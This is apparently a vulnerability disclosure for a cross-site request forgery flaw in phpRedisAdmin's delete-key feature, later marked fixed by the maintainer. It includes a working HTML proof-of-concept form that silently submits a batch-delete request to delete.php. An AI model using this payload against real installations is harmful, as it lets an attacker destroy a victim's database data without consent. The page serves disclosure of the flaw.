Cross-Site Request Forgery (CSRF) in erikdubbelboer/phpredisadmin
Aug 23rd 2021
The delete key functionality in the application is vulnerable to CSRF attack.
🕵️♂️ Proof of Concept
<html> <body> <script>history.pushState('', '', '/')</script> <form action="https://domain.tld/phpRedisAdmin/delete.php?s=1&d=0&batch_del=1" method="POST"> <input type="hidden" name="post" value="1" /> <input type="hidden" name="selected_keys" value="123," /> <input type="submit" value="Submit request" /> </form> </body> </html>
This vulnerability can let an attacker delete data from the database without the knowledge/interaction of the user.
We have contacted a member of the erikdubbelboer/phpredisadmin team and are waiting to hear back 2 years ago
Erik Dubbelboer marked this as fixed with commit b57e3b 2 years ago
The fix bounty has been dropped
This vulnerability will not receive a CVE
to join this conversation